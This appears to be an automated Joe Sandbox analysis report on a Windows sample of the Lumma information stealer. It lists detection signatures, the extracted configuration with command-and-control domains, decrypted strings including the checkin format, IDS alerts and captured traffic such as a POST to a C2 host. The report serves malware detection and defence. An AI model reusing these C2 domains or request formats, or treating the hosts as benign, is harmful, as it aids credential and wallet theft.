Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1526564
MD5:ac789b4838922466f1437f6e440dc4a3
SHA1:97fc5c2cdbe860263e156b840ace62149fca84d8
SHA256:074ee51d9bc6abc3f6c43925201998cdcb801413fc80cde720e493a0dc0e6dd5
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1352 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AC789B4838922466F1437F6E440DC4A3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["clearancek.site", "bathdoomgaz.stor", "eaglepawnoy.stor", "studennotediw.stor", "dissapoiznw.stor", "mobbipenju.stor", "spirittunek.stor", "licendfilteo.site"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T11:35:12.775553+020020546531A Network Trojan was detected192.168.2.449731188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T11:35:12.775553+020020498361A Network Trojan was detected192.168.2.449731188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T11:35:08.803774+020020564771Domain Observed Used for C2 Detected192.168.2.4631071.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T11:35:07.058401+020020564711Domain Observed Used for C2 Detected192.168.2.4651851.1.1.153UDP
    2024-10-06T11:35:08.060298+020020564711Domain Observed Used for C2 Detected192.168.2.4651851.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T11:35:08.767142+020020564811Domain Observed Used for C2 Detected192.168.2.4585551.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T11:35:08.754490+020020564831Domain Observed Used for C2 Detected192.168.2.4569211.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T11:35:08.822303+020020564731Domain Observed Used for C2 Detected192.168.2.4584231.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T11:35:08.740534+020020564851Domain Observed Used for C2 Detected192.168.2.4600521.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T11:35:08.813764+020020564751Domain Observed Used for C2 Detected192.168.2.4568761.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T11:35:08.793486+020020564791Domain Observed Used for C2 Detected192.168.2.4629831.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Found malware configuration
    Source: file.exe.1352.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["clearancek.site", "bathdoomgaz.stor", "eaglepawnoy.stor", "studennotediw.stor", "dissapoiznw.stor", "mobbipenju.stor", "spirittunek.stor", "licendfilteo.site"], "Build id": "4SD0y4--legendaryy"}
    Multi AV Scanner detection for domain / URL
    Source: https://steamcommunity.com:443/profiles/76561199724331900Virustotal: Detection: 8%Perma Link
    Source: https://licendfilteo.site:443/apiVirustotal: Detection: 11%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.stor
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.stor
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.stor
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.stor
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.stor
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.stor
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001E50FA
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001AD110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001AD110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_001E63B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h0_2_001E695B
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_001E99D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_001AFCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_001B0EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [edx]0_2_001A1000
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec ebx0_2_001DF030
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_001B6F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_001E4040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_001E6094
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_001CD1E1
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_001C2260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], ax0_2_001C2260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_001B42FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_001AA300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_001D23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_001D23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_001D23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al0_2_001D23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_001D23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+14h]0_2_001D23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_001BB410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_001CE40C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_001BD457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]0_2_001E1440
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_001CC470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_001E64B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_001C9510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_001B6536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh0_2_001E7520
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_001DB650
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_001CE66A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]0_2_001E7710
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001E5700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_001CD7AF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]0_2_001E67EF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_001C28E9
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_001E3920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_001BD961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_001A49A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_001B1A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_001A5A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_001E4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_001B1ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+000006B8h]0_2_001BDB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h0_2_001BDB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_001E9B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_001D0B80
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_001B1BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_001B3BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_001C7C00
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh0_2_001DFC20
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h0_2_001CEC48
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_001CAC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], ax0_2_001CAC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_001CCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001CCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_001CCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001E9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_001E9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_001CFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_001CDD29
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001E8D8A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, ecx0_2_001B4E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, word ptr [ecx]0_2_001CAE57
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001C5E70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_001C7E60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_001B1E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_001B6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_001ABEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_001A6EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001DFF70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_001C9F62
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_001B6F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], 0000h0_2_001BFFDF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_001E5FD6
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_001A8FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h0_2_001E7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001E7FC0

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:65185 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:60052 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:62983 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:58555 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:56921 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:63107 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:58423 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:56876 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.96.3:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: bathdoomgaz.stor
    Source: Malware configuration extractorURLs: eaglepawnoy.stor
    Source: Malware configuration extractorURLs: studennotediw.stor
    Source: Malware configuration extractorURLs: dissapoiznw.stor
    Source: Malware configuration extractorURLs: mobbipenju.stor
    Source: Malware configuration extractorURLs: spirittunek.stor
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sensatinwu.buzz
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sensatinwu.buzz
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sensatinwu.buzz
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812846129.000000000103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812846129.000000000103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812846129.000000000103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fF
    Source: file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.&
    Source: file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
